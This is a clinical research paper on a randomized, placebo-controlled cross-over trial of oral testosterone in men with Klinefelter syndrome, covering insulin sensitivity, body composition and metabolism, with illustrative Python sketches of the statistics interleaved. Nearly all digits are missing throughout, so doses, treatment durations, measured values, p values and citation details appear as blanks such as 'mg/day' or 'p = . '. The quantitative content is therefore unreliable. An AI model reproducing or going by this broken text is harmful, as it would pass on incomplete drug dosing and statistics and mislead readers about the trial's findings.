the study was a -month randomized, double-blinded, placebo-controlled, cross-over study without a washout period (fig. ). randomization was performed in blocks of six in order to ensure equal numbers in each group, and by an independent body. study days consisted of two coupled days: day or 'metabolic day', and day , allocated for dexa estimation of body composition, ct measuring the amount of intra-abdominal (visceral) fat mass, a vo max test, muscle strength and -h ambulatory blood pressure measurement (ambp) (fig. ). the ks group was randomized to either testosterone in the form of andriol® (testosterone undecanoate) or placebo treatment and subsequently crossed over. the andriol® dose was mg/day divided in two doses of mg, and participants were instructed to ingest the medicine with a fatty meal. compliance was measured by counting the remaining pills after every -month period.
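the randomization scheme described above (permuted blocks of six, two treatment sequences in a cross-over design) can be illustrated with a short python sketch; the block size and the two sequence arms come from the text, while the function name, seed and number of participants are hypothetical and only for illustration.

```python
import random

def block_randomize(n_participants, block_size=6,
                    arms=("testosterone-first", "placebo-first"), seed=42):
    """Allocate participants to cross-over sequences in permuted blocks,
    so the two arms stay balanced within every block (illustrative only)."""
    assert block_size % len(arms) == 0, "block size must be a multiple of the number of arms"
    rng = random.Random(seed)
    allocation = []
    while len(allocation) < n_participants:
        block = list(arms) * (block_size // len(arms))
        rng.shuffle(block)          # random order within the block
        allocation.extend(block)
    return allocation[:n_participants]

print(block_randomize(20))
```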
the control group did not receive any treatment and was examined once. the ks group was examined before and after each -month period. ks participants received their last tablet the evening before the examinations. three days before the study, volunteers were instructed not to participate in heavy physical exercise or to drink alcoholic beverages. after an overnight fast (> h) subjects were admitted to the clinical research unit and confined to bed.

hyperinsulinemic euglycemic clamp
at : h (t = − min) a catheter was placed into an antecubital vein for infusion of saline to maintain catheter patency. another catheter was inserted into a vein on the contralateral hand and kept in a thermo-regulated heating box ( °c) for sampling of arterialized venous blood. after collection of baseline blood samples, plasma was collected for metabolites at t = , , and min. at t = min, a -h infusion of human insulin (actrapid; novo nordisk a/s) commenced ( . mu/kg total body mass/min). plasma glucose was measured every min and clamped at mmol/l by a variable infusion of % glucose. the glucose infusion rate during the last hour of the clamp (m value) was used as an index of insulin sensitivity. insulin and metabolite concentrations were determined every min. respiratory exchange rates (rq) and total energy expenditure (ee) were calculated from indirect calorimetry (deltatrac; datex instrumentarium, helsinki, finland) and urea excretion. oxidation rates of glucose were calculated based on non-protein ee and rq ( ). indirect calorimetry was performed from t = − to t = min and from t = to t = min. at min, all catheters were removed and plasma glucose stabilized, and the participants had lunch and were discharged.

figure: outline of the study design and the two separate study days (screening investigations; testosterone and placebo treatment periods; day : hyperinsulinemic euglycemic clamp with insulin infusion, blood samples, indirect calorimetry and microdialysis measurement of glucose, lactate and glycerol; day : dexa scan with determination of body composition, ct slice for intra-abdominal fat, vo max testing, muscle strength determination and -hour blood pressure measurement).

analytical techniques
plasma glucose was analyzed in duplicate using the glucose oxidase method (beckman coulter). measurements were performed immediately during the study. insulin was measured with an immunoassay (dako). the homa calculator was downloaded from https://www.dtu.ox.ac.uk/homacalculator/. plasma glucagon was measured by a ria ( ). testosterone, dheas, androstenedione and -hydroxy-progesterone were measured by liquid-chromatography tandem mass spectrometry. the limit of detection for testosterone was . nmol/l, and the working ranges were . – nmol/l. the working range was assessed from the precision profile, and defined as the concentration at which the coefficient of variation (cv) was < %.
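two indices of insulin sensitivity are used above: the clamp-derived m value (glucose infusion rate over the last hour of the clamp) and homa-ir (the authors used the downloadable oxford homa calculator, which is model-based). the sketch below is only a rough illustration of both quantities; the function names, the normalisation to lean body mass and all numbers are assumptions, and the homa formula shown is the classic homa1 approximation rather than the homa2 computer model used in the paper.

```python
import numpy as np

def m_value(minutes, glucose_infusion_mg_per_min, lean_body_mass_kg, last_hour=(120, 180)):
    """Mean glucose infusion rate over the last hour of the clamp,
    normalised to lean body mass (mg/kg LBM/min). Illustrative only."""
    minutes = np.asarray(minutes)
    gir = np.asarray(glucose_infusion_mg_per_min)
    mask = (minutes >= last_hour[0]) & (minutes <= last_hour[1])
    return gir[mask].mean() / lean_body_mass_kg

def homa1_ir(fasting_glucose_mmol_l, fasting_insulin_mu_l):
    """Classic HOMA1-IR approximation: glucose [mmol/L] x insulin [mU/L] / 22.5."""
    return fasting_glucose_mmol_l * fasting_insulin_mu_l / 22.5

# toy clamp profile sampled every 10 min; infusion rate ramps up as the clamp proceeds
t = np.arange(0, 181, 10)
gir = np.linspace(50, 420, t.size)
print(round(m_value(t, gir, lean_body_mass_kg=60.0), 1))   # mg/kg LBM/min
print(round(homa1_ir(5.4, 10.0), 2))                        # ~2.4
```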
sex hormone-binding globulin, fsh and lh were analyzed on the architect i platform (abbott) by chemiluminescent micro particle immunoassay method using the corresponding kits. the working ranges were . – nmol/l, . – ie/l and . - ie/l, respectively. serum igf- was measured by noncompetitive tr-ifma and serum igfbp- was measured by an immunoradiometric assay (irma) (diagnostic system laboratories inc.). c-reactive protein (crp) was measured by a high-sensitive crp tr-ifma with a detection limit of . μg/l. plasma lipids and triglycerides were measured using an automated commercially available system (aeroset, abbott diagnostics, abbott park laboratories). the cv was < %. serum ffa was determined by a colorimetric method using a commercial kit (wako chemicals). body composition, maximal aerobic capacity and -h ambulatory blood pressure measurement body weight was measured on trial day before confinement to bed (with the participants wearing underwear) to the nearest . kg, height was measured to the nearest . cm at inclusion and bmi was calculated. on the following day we measured total and regional fat mass (g) and lean body mass (g) by dual x-ray densitometry (dexa) using a hologic /w osteodensitometer (hologic, waltham, ma, usa). the system software provided the mass of lean body, fat and bone mineral for the whole body and specific regions. appendicular, trunk and visceral trunk fat mass and trunk and appendicular lean body mass were extracted. the cv for the dexa scans was < % as estimated by repeated measurements ( ). the amount of intra-abdominal (visceral) fat was evaluated by ct with a somatom plus-s scanner (siemens). the subjects were studied in the supine position. the areas scanned comprised and mm cross-sectional slices at the umbilicus using kv and mas. the same technician performed all the scans, which subsequently were analyzed by the same radiologist (agj). then a -min submaximal exercise test with continuous monitoring of heart rate was performed on a bicycle ergometer (monark ergometric e, monark exercise, varberg, sweden). we used a workload of – kpm/min, depending on age and reported physical activity by the subject, and maximal aerobic capacity (vo max) was calculated ( ) based on extrapolation of heart rate, age of the participant and weight. the isometric strength of the right biceps and quadriceps muscles was assessed on day by means of a dynamometer (good strength, metitur ltd, jyväskylä, finland), which electronically measures the isometric muscle functions in the upper and lower limbs. the strength was calculated as the mean of three voluntary maximum isometric contractions separated by min intervals. all the participants, ks and controls, underwent -h ambp using an automatic portable apparatus (spacelabs , redmond, washington, usa) at the end of the examination program. the apparatus used an oscillometric method of bp measurement. an appropriate cuff size placed on the left arm was used and readings were obtained every min for a period of h on a normal weekday. time of bed and time of rise in the morning was noted by the participant. microdialysis after application of a local analgesic (lidocaine), microdialysis catheters (cma- ; cma, stockholm, sweden) were inserted in subcutaneous adipose tissue in the periumbilical region. the microdialysis catheters have a molecular cutoff of kda and a membrane length of mm and were perfused at a flow rate of ml/min using cma- perfusion pumps (cma). 
changes in interstitial glycerol concentration can be taken as an index of lipolysis ( ). glycerol, glucose and lactate in the microdialysis dialysate were measured in duplicate by an automated spectrophotometric kinetic enzymatic analyzer (cma- ).

statistics
all standard statistical calculations were performed using spss for windows version . (spss inc.). data were checked for normality with kolmogorov–smirnov's test and by plotting. comparisons between groups were done with student's unpaired t-test or the mann–whitney u test, as appropriate. the development over time during the clamp in different analytes was analyzed with mixed models, as detailed below. we first compared placebo-treated ks with controls, and then we compared the effect of treatment (placebo or testosterone) within the ks group. the comparison of the treated ks and the controls was based on a test for interaction between the group and time factors, i.e. a test for parallel time curves. the effect of treatment within the ks group was based on a mixed model on the differences at each time point for each individual. due to inhomogeneity between the standard deviations at different time points, and also between the treated ks and the controls, we used mixed models with unstructured covariance matrices and satterthwaite approximation when calculating p values with sas/stat proc mixed (sas institute inc., sas/stat® user's guide, cary, nc; http://support.sas.com). we used a per-protocol analysis approach and thus did not include the drop-outs in the final analysis. data are shown as mean ± s.d. or median (range). p values < . were regarded as statistically significant.

results
characteristics of study subjects and body composition during treatment
at baseline, males with ks and controls were similar on most anthropometric body composition measures (table ). placebo-treated ks had greater total and intra-abdominal fat mass (p ≤ . ) and lower lumbar bone mineral density (p = . ) (table ) compared with controls at the end of the study. testosterone treatment did not affect crude measures of body composition compared to baseline in males with ks, but weight, bmi, hip and waist circumference increased significantly during placebo treatment (table ). after months, no difference was observed regarding the same measures comparing testosterone and placebo-treated men with ks (table ). however, abdominal fat and total body fat were higher in placebo versus testosterone-treated ks patients evaluated both by dexa and ct (p ≤ . for all, table ). total lean body mass increased during testosterone compared with placebo treatment, approaching statistical significance. two participants dropped out of the study due to perceived side effects. these side effects were not considered to be serious. there were no other reported side effects.
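the group-by-time analysis described in the statistics section can be sketched in python; this is only an illustration of a test for parallel time curves with a random intercept per subject (statsmodels' mixedlm), not the sas proc mixed model with a fully unstructured covariance matrix and satterthwaite degrees of freedom that the authors used, and the data below are synthetic.

```python
import numpy as np
import pandas as pd
import statsmodels.formula.api as smf

rng = np.random.default_rng(0)
rows = []
for subject in range(20):
    group = "KS" if subject < 10 else "CTRL"
    basal = rng.normal(0.55, 0.05)
    for t in (0, 60, 120):
        # FFA falls during the clamp; suppression is made weaker in KS (toy assumption)
        drop = (0.003 if group == "KS" else 0.004) * t
        rows.append({"subject": subject, "group": group, "time": t,
                     "ffa": basal - drop + rng.normal(0, 0.02)})
df = pd.DataFrame(rows)

# test for parallel time curves: the group x time interaction terms
model = smf.mixedlm("ffa ~ C(group) * C(time)", df, groups=df["subject"])
print(model.fit(reml=True).summary())
```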
insulin sensitivity and circulating metabolites
insulin sensitivity was similar in placebo-treated ks and controls (fig. ), while homa-ir tended to be higher (p = . ). glucagon, insulin and ffa showed a similar curvature in ks and controls during the clamp (non-significant interaction term group * time, p values not shown). glucagon and insulin levels were similar in placebo-treated ks and controls during basal (p = . and p = . , respectively) (fig. ) and during the entire clamp, including hyperinsulinemic circumstances (p = . and p = . , respectively), whereas ffa levels were not suppressed to similar levels among males with ks (p = . ) (fig. ). igfbp , but not igf- , was higher in placebo-treated ks as compared to controls (table ). crp was also similar between placebo-treated ks and controls. testosterone treatment did not affect insulin sensitivity in ks (p = . ) (fig. ) or homa-ir (p = . ). insulin and ffa levels were similar in placebo-treated and testosterone-treated ks during basal (p = . and p = . ) and hyperinsulinemic circumstances (p = . and p = . ) (fig. ). glucagon was similar at baseline (p = . ), but slightly lower during testosterone treatment (p = . ). igf-i (p < . ), but not igfbp (p = . ), was higher among testosterone-treated ks compared with placebo (fig. ).

sex hormones, gonadotrophins, hemoglobin and hematocrit
testosterone and hemoglobin were lower in placebo-treated ks compared with controls, while levels of lh and fsh were higher, whereas levels of shbg, -oh progesterone, dheas and androstenedione were comparable (table ). testosterone, lh and fsh levels were comparable between placebo and testosterone-treated ks patients, whereas shbg levels were suppressed by testosterone treatment in ks (table ). likewise, androstenedione levels were comparable, whereas -oh progesterone and dheas were higher in placebo versus testosterone-treated ks (table ). hemoglobin was higher during testosterone treatment (fig. ), while levels of total cholesterol, ldl cholesterol, hdl cholesterol, triglycerides and alanine aminotransferase were unchanged.

resting ee, physical fitness and muscle strength
resting ee was similar between placebo-treated ks and controls during basal and hyperinsulinemic circumstances (results not shown), and likewise, muscle strength was also similar, although numerically lower among placebo-treated ks (table ). vo max was markedly lower in placebo-treated ks compared to controls (p = . ). resting ee and rq during basal and hyperinsulinemic circumstances were unaffected by testosterone treatment (all p > . ). vo max was only marginally affected by testosterone treatment (p = . ), while muscle strength in the biceps and quadriceps muscles was comparable between groups (table ).

microdialysis
interstitial concentrations of glucose
baseline levels of interstitial glucose (mmol/l) in abdominal adipose tissue were comparable between placebo-treated ks and controls ( . ± . vs . ± .
, respectively, p = . ), and there were no effects over time (p = . and p = . , basal and clamp periods, respectively). baseline concentrations did not differ between placebo and testosterone-treated ks ( . ± . vs . ± . , p = . ), and no change was seen with time (p = . and p = . , basal and clamp periods, respectively).

interstitial concentrations of glycerol
baseline concentrations of interstitial glycerol (µmol/l) in abdominal adipose tissue were marginally higher among ks compared with controls ( ± vs ± , respectively, p = . ). there were no effects over time (p = . and p = . , basal and clamp periods, respectively). likewise, there was no difference between placebo and testosterone-treated ks ( ± vs ± , p = . ), and no effect over time (p = . and p = . , basal and clamp periods, respectively).

interstitial concentrations of lactate
baseline concentrations of interstitial lactate (mmol/l) in abdominal adipose tissue did not differ between placebo-treated ks and controls ( . ± . vs . ± . , p = . ). there was no difference over time (p = . and p = . , basal and clamp periods, respectively). there was no difference between placebo and testosterone-treated ks ( . ± . vs . ± . , p = . ), and no effect over time for the comparison (p = . and p = . , basal and clamp periods, respectively).

-h ambulatory blood pressure
no differences between placebo- and testosterone-treated ks patients were detected with respect to any measures from -h ambp. likewise, no differences were seen between placebo-treated ks and controls (table ).

table: age of participants and anthropometric data at baseline in males with klinefelter syndrome and controls (klinefelter syndrome, mean ± s.d.; control, mean ± s.d.; p value) for age (years), height (cm), weight (kg) and bmi (kg/m). in the lower part of the table, anthropometric data at baseline and during treatment with either placebo or testosterone in klinefelter syndrome are presented (baseline; testosterone; baseline vs testosterone; placebo; baseline vs placebo; testosterone vs placebo) for weight (kg), bmi (kg/m), hip (cm) and waist (cm).

discussion
this study, to our knowledge, is the first randomized trial of testosterone and placebo in ks studying insulin sensitivity, metabolism, body composition, muscle strength and maximal oxygen uptake. the principal results demonstrate distinct effects of testosterone on body composition, especially reductions in abdominal fat mass and total body fat during a -month course of testosterone treatment in ks. testosterone treatment, on the other hand, did not change glucose homeostasis, circulating levels of free fatty acids or other measures of intermediate metabolism, but we speculate that longer term testosterone treatment would lead to greater changes in body composition and reductions in visceral fat, and in turn eventually increase insulin sensitivity.
the reductions in fat mass were accompanied by other testosterone-responsive changes, such as an increase in hemoglobin and igf-i, reductions in shbg and discrete changes in adrenal androgens such as -hydroxy progesterone and dheas, but not androstenedione, showing that active testosterone treatment influences adrenal steroidogenesis in a specific manner ( ). although hemoglobin increased significantly among males with ks during active treatment, the level was still somewhat lower than among controls. the testosterone-induced increase in hemoglobin seems to occur via increased erythropoietin and decreased ferritin and hepcidin ( ). due to the design of the study, with withdrawal of study medication the day before examinations, we saw no changes in testosterone, lh and fsh.

table: body composition determined by ct and dexa, muscle strength, androgens and other hormones, lipids, -h ambulatory blood pressure measurements (mmhg), and vo max in males with klinefelter syndrome during testosterone or placebo treatment and in controls (columns: placebo; testosterone; p value placebo vs testosterone; controls; p value placebo vs controls). rows cover ct measures (total abdominal fat, intra-abdominal fat, ratio of visceral to total fat), dexa measures (total body fat, abdominal fat, abdominal lean body mass, abdominal total mass, abdominal fat %, visceral fat, total body lean mass, total lumbar bmd, total hip bmd), muscle strength (right biceps, right quadriceps), biochemistry (testosterone, dheas, -hydroxy-progesterone, androstenedione, lh, fsh, shbg, hemoglobin, igf-i, igfbp- , crp, total cholesterol, ldl cholesterol, hdl cholesterol, triglycerides, alanine aminotransferase), ambulatory blood pressure (day, night and -h systolic and diastolic ambp) and exercise capacity (vo max, ml o /kg/min).

previously, short-term testosterone gel treatment ( days) of hypogonadal men of different etiologies resulted in increments in lean body mass and reductions in fat mass measured by dexa. the changes occurred in
a dose-dependent fashion, but with increments in lean body mass only occurring with testosterone levels in the higher normo-physiological range ( ). woodhouse et al. studied experimental hypogonadism and -week graded testosterone enanthate treatment ( ). here, low physiological testosterone levels were associated with gains in subcutaneous, intermuscular and intra-abdominal adipose tissue, whereas testosterone levels in the normo- to supra-physiological range of . – . nmol/l increased lean body mass and reduced subcutaneous fat mass, but not total body fat or intra-abdominal fat mass ( ). our results are in line with the latter study, since only subcutaneous abdominal and total body fat, but not intra-abdominal fat mass, was reduced during testosterone treatment. although lean body mass, physical fitness and maximal muscle strength increased nominally, these changes were not statistically significantly affected by treatment in this study, perhaps because of a limited study sample. notably, males with ks had much lower exercise capacity as evaluated by measurement of vo max, as also previously documented in observational studies ( , ). of note, we saw nominal increases in weight and bmi from baseline through both treatment arms. albeit only significant for the comparison with the placebo arm, these data underline the deleterious body compositional effects of a continuous hypogonadal milieu in these patients. in young boys with ks ( – years of age), treatment with oxandrolone, a non-aromatizable androgen not converted to estradiol, also led to lower body fat as measured by skin fold caliper ( ). in a previous study among males with ks we described a high incidence of the metabolic syndrome and insulin resistance compared with an age-matched control group. about % of ks patients fulfilled the criteria for the metabolic syndrome, compared with % among controls ( , ). similar findings were later reported by ishikawa et al. ( ). in the current study, testosterone treatment had no effect on insulin-mediated glucose disposal (m value) or insulin sensitivity as expressed by the homa-ir index, although a trend toward higher homa-ir was detected in placebo-treated ks compared to controls (p = . ). of note, the males with ks studied here were not overtly obese, but overweight.

figure: (a) bmi, total and intra-abdominal fat in males with klinefelter syndrome and controls; (b) insulin sensitivity (m value, mg/kg lbm/min) in males with klinefelter syndrome and controls, with no significant difference between groups. open circles indicate placebo-treated ks, closed circles testosterone-treated ks and open squares controls; p values are indicated in the figure.

in an uncontrolled setup, -month testosterone treatment in a group of males with ks with similar body composition was shown to improve homa-ir without changing bmi or waist circumference ( ). in that study, however, homa-ir values were markedly higher than here ( . ± . vs . ± . , respectively, for placebo-treated ks), and unfortunately, no data on regional body composition
were provided. thus, it is not clear whether reductions in intra-abdominal adipose tissue, which is normally believed to reflect insulin sensitivity, did in fact occur in that study following treatment. intermediate metabolism, reflected by free fatty acids and circulating hormones, was also unaffected by active treatment. some studies have indicated that testosterone treatment of hypogonadal patients with type diabetes may primarily help obese patients with improvements in insulin sensitivity ( ), while this may not happen in lean patients ( ), which could indicate that testosterone therapy works by affecting 'modifiable fat', which usually would be visceral fat. however, a meta-analysis including about men from cross-sectional studies and with type diabetes showed that testosterone levels were significantly lower in patients with type diabetes even after controlling for age and bmi. here it was concluded that higher testosterone levels lead to a decreased risk of type diabetes mellitus ( ). testosterone may also have direct effects on insulin sensitivity, because in patients with hypogonadotropic hypogonadism, removal of testosterone replacement therapy leads to reductions in insulin sensitivity within only days ( ). we previously showed that short-term hypogonadism in healthy males did not affect insulin sensitivity when studied with the gold standard hyperinsulinemic–euglycemic clamp technique ( , ), and neither during weeks of induced hypogonadism ( ) nor during weeks of treatment with a range of different doses ( ); however, -week treatment of healthy lean men with aromatase inhibitors resulted in a slight elevation of testosterone, decreased estradiol levels and decreased insulin sensitivity ( ), indicating a role for estradiol in determining insulin sensitivity in males. previously, we have found normal levels of estradiol in males with ks, with higher levels in testosterone-treated ks ( , , ).

figure: (a) hemoglobin and igf-i in males with klinefelter syndrome during placebo or testosterone treatment and in controls; (b) ffa, insulin and glucagon at baseline and during clamp conditions. open circles indicate placebo-treated ks, closed circles testosterone-treated ks and open squares controls.

interestingly, we observed only partial suppression of ffas during the clamp when comparing placebo-treated ks with controls, an indirect sign of insulin resistance.
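the degree of ffa suppression referred to above is simply the relative fall in circulating free fatty acids from the basal period to the hyperinsulinemic clamp; the small sketch below illustrates the calculation with made-up concentrations (all values and the function name are hypothetical).

```python
def ffa_suppression_pct(basal_ffa_mmol_l, clamp_ffa_mmol_l):
    """Percent fall in circulating FFA from the basal period to the insulin clamp."""
    return 100.0 * (basal_ffa_mmol_l - clamp_ffa_mmol_l) / basal_ffa_mmol_l

# hypothetical values: fuller suppression in controls than in KS
print(round(ffa_suppression_pct(0.55, 0.12), 1))  # controls: ~78.2 %
print(round(ffa_suppression_pct(0.55, 0.20), 1))  # KS: ~63.6 %
```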
to conclude, there is both epidemiological and clinical evidence that shows a four-fold increased risk of diabetes and metabolic syndrome in ks. presently, there is no evidence to suggest that testosterone replacement therapy of ks patients improves insulin sensitivity, although it is likely that indirect effects on body composition and physical fitness in the longer term will lead to lowered insulin resistance and thus could protect from development of type diabetes. the dissociation reported here between positive changes in body composition and no changes in glucose homeostasis may indicate that the high prevalence of type diabetes in males with ks is a syndrome-specific trait that perhaps need much longer treatment and more precise normalization of testosterone levels to overcome. longer term and larger studies will be needed to show this. we saw a significant effect of testosterone treatment on circulating igf-i, which is otherwise within normal levels in ks, both in childhood and adulthood ( , ), without any change in igfbp- . testosterone acts both via an effect on gh secretion and action, which subsequently enhances and augments the beneficial effects on fat oxidation and protein synthesis ( ). igfbp- was somewhat higher among males with ks, for which we have no ready explanation. we used oral testosterone undecanoate which can show varying bioavailability, but nevertheless has been shown to have effects on body composition before ( ), as also shown here. it may have been more efficacious to use either transdermal or injectable testosterone, which might have led to more pronounced effects on different androgen-responsive measures. although we carefully matched ks and controls, we cannot be sure that the two groups are comparable on socioeconomic factors, habitual physical activity and diet, factors that could for instance affect measures of glucose homeostasis. there were several drop-outs during the study, but there was no common theme in their background for stopping participation in the study. two males with ks dropped out due to reported side effects of the study medication. these were naïve to the effect of testosterone and thought it unpleasant to feel the normal effects of testosterone treatment. we did not find that there were any consistent differences between drop-outs and those that continued participation. the fact that some patients had never received testosterone, while others had and were using testosterone until inclusion in the study, can thus also be seen as a limitation of the study, and although all males with ks were only examined after months of either active treatment or placebo, we cannot exclude that months is an insufficient washout period for effects of testosterone on for example insulin sensitivity. thus, we cannot exclude a type ii error in the present study and inclusion of a larger study group would have been advantageous. originally, it was our intent to include more males with ks, but we experienced a great deal of reluctance because of the months of placebo treatment, which especially the males that were treated before entering the trial saw as problematic. we did not experience any serious adverse effects during the study. in conclusion, testosterone for months induces significant and positive effects on body composition in males with ks, including a reduced abdominal fat mass. 
we observed no changes in measures of glucose homeostasis, but prolonged treatment with testosterone in ks will likely lead to further positive changes also regarding glucose homeostasis. we observed no serious adverse effects of testosterone treatment.

declaration of interest
c h is a senior editor for endocrine connections. c h was not involved in the review or editorial process for this paper, on which he is listed as an author. the other authors have nothing to disclose.

funding
all authors have completed the unified competing interest form at www.icmje.org/coi_disclosure.pdf (available on request from the corresponding author) and declare that this study was supported by grants from the danish medical research council, an unconditional research grant from ipsen pharma, grants from the novo nordisk foundation, the aase and einar danielsen foundation and the danish diabetes association. none of the study funders had any role in study design, collection, analysis, interpretation, preparation of the manuscript or in the decision to submit the article for publication.

author contribution statement
c h, a b, k k, a g j, n h b and c h g contributed substantially to conception and design of the study. c h, k a g, m e and c h g analyzed the data, c h drafted the manuscript and c h g designed the tables. all authors were involved in the interpretation of the data, critically revised the article and approved the final version for publishing. all authors had full access to the data in the study and take full responsibility for the integrity of the data and the accuracy of the data analysis. c h g is the guarantor of the study and affirms that the manuscript is honest, accurate and transparent and that no important aspects of the study have been omitted.

acknowledgements
the technical assistance of lone svendsen, lene christensen, susanne sørensen, hanne petersen, hanne mertz and joan hansen (medical research laboratories) and the staff at the osteoporosis clinic, aarhus university hospital is highly appreciated. the authors also wish to thank the doctors who referred their ks patients to us.

references
bojesen a, juul s & gravholt ch. prenatal and postnatal prevalence of klinefelter syndrome: a national registry study. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) gravholt ch, chang s, wallentin m, fedder j, moore p & skakkebaek a. klinefelter syndrome – integrating genetics, neuropsychology and endocrinology. endocrine reviews – . (https://doi.org/ . /er. - ) smyth cm & bremner wj. klinefelter syndrome. archives of internal medicine – . (https://doi.org/ . /archinte. . . ) bojesen a, kristensen k, birkebaek nh, fedder j, mosekilde l, bennett p, laurberg p, frystyk j, flyvbjerg a, christiansen js, et al. the metabolic syndrome is frequent in klinefelter's syndrome and is associated with abdominal obesity and hypogonadism. diabetes care – . (https://doi.org/ .
/dc - ) ishikawa t, yamaguchi k, kondo y, takenaka a & fujisawa m. metabolic syndrome in men with klinefelter’s syndrome. urology – . (https://doi.org/ . /j.urology. . . ) swerdlow aj, higgins cd, schoemaker mj, wright af, jacobs pa & united kingdom clinical cytogenetics group. mortality in patients with klinefelter syndrome in britain: a cohort study. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) nielsen j, johansen k & yde h. frequency of diabetes mellitus in patients with klinefelter’s syndrome of different chromosome constitutions and the xyy syndrome. plasma insulin and growth hormone level after a glucose load. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem- - - ) pei d, sheu wh, jeng cy, liao wk & fuh mm. insulin resistance in patients with klinefelter’s syndrome and idiopathic gonadotropin deficiency. journal of the formosan medical association – . grossmann m, thomas mc, panagiotopoulos s, sharpe k, macisaac rj, clarke s, zajac jd & jerums g. low testosterone levels are common and associated with insulin resistance in men with diabetes. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) bojesen a, juul s, birkebaek nh & gravholt ch. morbidity in klinefelter syndrome: a danish register study based on hospital discharge diagnoses. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) grossmann m, gianatti ej & zajac jd. testosterone and type diabetes. current opinion in endocrinology, diabetes, and obesity – . (https://doi.org/ . /med. b e cf) selvin e, feinleib m, zhang l, rohrmann s, rifai n, nelson wg, dobs a, basaria s, golden sh & platz ea. androgens and diabetes in men: results from the third national health and nutrition examination survey (nhanes iii). diabetes care – . (https://doi.org/ . /dc - ) heufelder ae, saad f, bunck mc & gooren l. fifty-two-week treatment with diet and exercise plus transdermal testosterone reverses the metabolic syndrome and improves glycemic control in men with newly diagnosed type diabetes and subnormal plasma testosterone. journal of andrology – . (https://doi. org/ . /jandrol. . ) gopal ra, bothra n, acharya sv, ganesh hk, bandgar tr, menon ps & shah ns. treatment of hypogonadism with testosterone in patients with type diabetes mellitus. endocrine practice – . (https://doi.org/ . /ep .or) wang c, swerdloff rs, iranmanesh a, dobs a, snyder pj, cunningham g, matsumoto am, weber t, berman n & testosterone gel study group. transdermal testosterone gel improves sexual function, mood, muscle strength, and body composition parameters in hypogonadal men. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem. . . ) yialamas ma, dwyer aa, hanley e, lee h, pitteloud n & hayes fj. acute sex steroid withdrawal reduces insulin sensitivity in healthy men with idiopathic hypogonadotropic hypogonadism. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) zitzmann m, bongers r, werler s, bogdanova n, wistuba j, kliesch s, gromoll j & tuttelmann f. gene expression patterns in relation to the clinical phenotype in klinefelter syndrome. journal of clinical endocrinology and metabolism e –e . (https://doi. org/ . /jc. - ) ozata m, ozisik g, caglayan s, yesilova z, bingol n, saglam m, turan m & beyhan z. effects of gonadotropin and testosterone treatments on plasma leptin levels in male patients with idiopathic hypogonadotropic hypogonadism and klinefelter’s syndrome. 
hormone and metabolic research – . (https://doi.org/ . /s- - ) rotondi m, coperchini f, renzullo a, accardo g, esposito d, groppelli g, magri f, cittadini a, isidori am, chiovato l, et al. high circulating levels of ccl in patients with klinefelter's syndrome. clinical endocrinology – . (https://doi.org/ . /cen. ) skakkebaek a, nielsen mm, trolle c, vang s, hornshoj h, hedegaard j, wallentin m, bojesen a, hertz jm, fedder j, et al. dna hypermethylation and differential gene expression associated with klinefelter syndrome. scientific reports . (https://doi.org/ . /s - - - ) frayn kn. calculation of substrate oxidation rates in vivo from gaseous exchange. journal of applied physiology: respiratory, environmental and exercise physiology – . (https://doi.org/ . /jappl. . . . ) orskov h, thomsen hg & yde h. wick chromatography for rapid and reliable immunoassay of insulin, glucagon and growth hormone. nature – . (https://doi.org/ . / b ) abrahamsen b, gram j, hansen tb & beck-nielsen h. cross calibration of qdr- and qdr- dual-energy x-ray densitometers for bone mineral and soft-tissue measurements. bone – . (https://doi.org/ . / - ( ) - ) astrand i. aerobic work capacity in men and women with special reference to age. acta physiologica scandinavica: supplementum – . hagstrom toft e, enoksson s, moberg e, bolinder j & arner p. absolute concentrations of glycerol and lactate in human skeletal muscle, adipose tissue, and blood. american journal of physiology e –e . (https://doi.org/ . /ajpendo. . . .e ) chang s, skakkebaek a, trolle c, bojesen a, hertz jm, cohen a, hougaard dm, wallentin m, pedersen ad, ostergaard jr, et al. anthropometry in klinefelter syndrome – multifactorial influences due to cag length, testosterone treatment and possibly intrauterine hypogonadism. journal of clinical endocrinology and metabolism e –e . (https://doi.org/ . /jc. - ) bachman e, travison tg, basaria s, davda mn, guo w, li m, connor westfall j, bae h, gordeuk v & bhasin s. testosterone induces erythrocytosis via increased erythropoietin and suppressed hepcidin: evidence for a new erythropoietin/hemoglobin set point. journals of gerontology: series a, biological sciences and medical sciences – . (https://doi.org/ . /gerona/glt ) woodhouse lj, gupta n, bhasin m, singh ab, ross r, phillips j & bhasin s. dose-dependent effects of testosterone on regional
adipose tissue distribution in healthy young men. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) bojesen a, birkebaek n, kristensen k, heickendorff l, mosekilde l, christiansen js & gravholt ch. bone mineral density in klinefelter syndrome is reduced and primarily determined by muscle strength and resorptive markers, but not directly by testosterone. osteoporosis international – . (https://doi.org/ . /s - - - ) davis sm, cox-martin mg, bardsley mz, kowal k, zeitler ps & ross jl. effects of oxandrolone on cardiometabolic health in boys with klinefelter syndrome: a randomized controlled trial. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) host c, bojesen a, frystyk j, flyvbjerg a, christiansen js & gravholt ch. effect of sex hormone treatment on circulating adiponectin and subforms in turner and klinefelter syndrome. european journal of clinical investigation – . (https://doi.org/ . /j. - . . .x) selice r, caretta n, di mambro a, torino m, palego p, ferlin a & foresta c. prostate volume and growth during testosterone replacement therapy is related to visceral obesity in klinefelter syndrome. european journal of endocrinology – . (https://doi.org/ . /eje- - ) corona g, monami m, rastrelli g, aversa a, sforza a, lenzi a, forti g, mannucci e & maggi m. type diabetes mellitus and testosterone: a meta-analysis study. international journal of andrology – . (https://doi.org/ . /j. - . . .x) host c, gormsen lc, christensen b, jessen n, hougaard dm, christiansen js, pedersen sb, jensen md, nielsen s & gravholt ch. independent effects of testosterone on lipid oxidation and vldl-tg production: a randomized, double-blind, placebo-controlled, crossover study. diabetes – . (https://doi.org/ . /db - ) host c, gormsen lc, hougaard dm, christiansen js, pedersen sb & gravholt ch. acute and short-term chronic testosterone fluctuation effects on glucose homeostasis, insulin sensitivity, and adiponectin: a randomized, double-blind, placebo-controlled, crossover study. journal of clinical endocrinology and metabolism e – e . (https://doi.org/ . /jc. - ) 